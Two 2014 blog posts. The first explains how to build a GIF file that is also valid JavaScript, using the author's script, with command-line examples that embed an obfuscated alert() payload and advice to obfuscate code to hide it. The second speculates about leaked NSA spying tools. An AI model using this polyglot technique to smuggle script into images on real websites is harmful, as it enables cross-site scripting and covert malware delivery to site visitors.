Monday, January 6, 2014

Hacking through image: GIF turn

In one of my previous posts I described a way to hack through images. That time I showed how a valid BMP file could be a valid JS file as well, hiding Javascript operations. Today it's time to describe how this attack work with a more common web file format: .GIF. Ange commented on my previous post showing me out his great work on the topic. I recomend to have a look to his study (here). Following my quick 'n dirty python implementation on the technique.

The following  HTML page wants to parse a GIF file and a JavaScript file which happen to be the same file: 1.gif_malw.gif. Theoretically the file should be or a valid GIF file or a valid JavaScript file. Could it be a valid javacript and a valid image file at the same time ? The answer should be NO. But properly forging the file the answer is YES, it is. Let's assume to have the following HTML page.


Browsing this file you'll find out this result:


As you can see, both tags (img and script) are succesfully executed. The Image tag is showing the black GIF file and the script tag is doing its gret job by executing a JavaScript (alert('test')). How is it possible ? The following image show one detail about the dirty code who generates the  beautiful GIF file. 


This is not magic at all. This is just my implementation of the GIF parsing bug many libraries have. The idea behind this python code is to create a valid GIF header within \x2F\x2A (aka \*) and then close up the end of the image through a \x2A\x2F (aka *\). Before injecting the payload you might inject a simple expression like "=1;" or the most commonly used "=a;" in order to use all the GIF block as a variable. The following image shows the first part of a forget GIF header to exploit this weakness (click  to enlarge). 


After having injected the "padding" chars (in this case I call padding the " '=a;' characters", which are useful to JS interpreter) it's time to inject the real payload. The small script I've realized automizes this process and you might want to run it in a really easy way:
 
Run-it as: gif.py -i image.gif "alert(\"test\");"


Don't forget, you might want to use obfuscators to better hide your javascript like the following example:

python gif.py -i 2.gif "var _0x9c4c=[\"\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\",\"\x0A\",\"\x4F\x4B\"];var a=_0x9c4c[0];function MsgBox(_0xccb4x3){alert(_0xccb4x3+_0x9c4c[1]+a);} ;MsgBox(_0x9c4c[2]);"

If you wat to check and/or download the code click here.
Enjoy your new hackish tool !


Saturday, January 4, 2014

NSA Technology

In 4 weeks I received from five to seven emails (don't remember exactly the number) asking my opinion about NSA Leaks. It's "hard" to talk about the spying situation happening around us, so I wont express my personal opinion on it, but I am going to share some simple questions that come in my mind while thinking to it.

According to many sources (just a couple of them, here and here) NSA developed an arsenal of super secret electronic weapons able to spy computers, networks, routers, firewalls and so on.. But if you are an avid reader you'll probably notice that all those weapons are almast 10 years old. Le's, for instance, focus on the PICASSO GSM HANDSET. The following image is taken directly from the leaked PICASSO GSM HANDSET documents.
Those mobile phone used to describe the project are 2 generations old. They've been maned  beginning of 2000.  Why NSA want to use old mobile phone to describe a super advanced technology ? Maybe because the described technology has been developed almost 10 years ago..?

Again, let's focus on NIGHTSTAND Wireless Exploitation project. The following image is taken directly from the leaked NIGHTSTAND Wireless Exploitation. The PC you are seeing in the black box belongs to a "previous netbook PC era". The monitor size reminds pretty old technology (today modern PCs do not have anymore square 1:1 monitor). Nowadays they will probably use a tablet or, even better, a smartphone.

Again, let's focus on what is written in the following leaked document:
VALIDATOR is a small Trojan implant used as a back door agains a variety of targeted Windows box from Windows 98 through Windows Server 2003.
The following image shows the leaked VALIDATOR description:
 The question rising in my mind is pretty straight forward:

"If 10 years ago NSA owned such a technology, what could own right now ?"

Now, let's assume the NSA is one of the most powerful organization on SIGINT and/or one of the biggest organization in the world owning advanced technology. NSA is a secret agency. A secret agency is great in its job if it "remains secret". We know that almost every nation/state on the earth owns a secret agency. We also know that such a kind of technology is a reality (we do have proves, right ?).

"How can we assert that NSA is the best security agency in the world ?"
"Does that leaks come from NSA because it is not the best secret agency in the world ?"
If so, are there any other big secret agencies in the world even more powerful than NSA ? If so, what about the technology owned from the biggest and best secret agency in the workd ?

Those questions did not express any personal opinion, they are just doubts and questions still opened in my mind. If somebody of you has some kind of answers and/or wants to share their own thoughs, he is wery welcome (please add comments and not emails).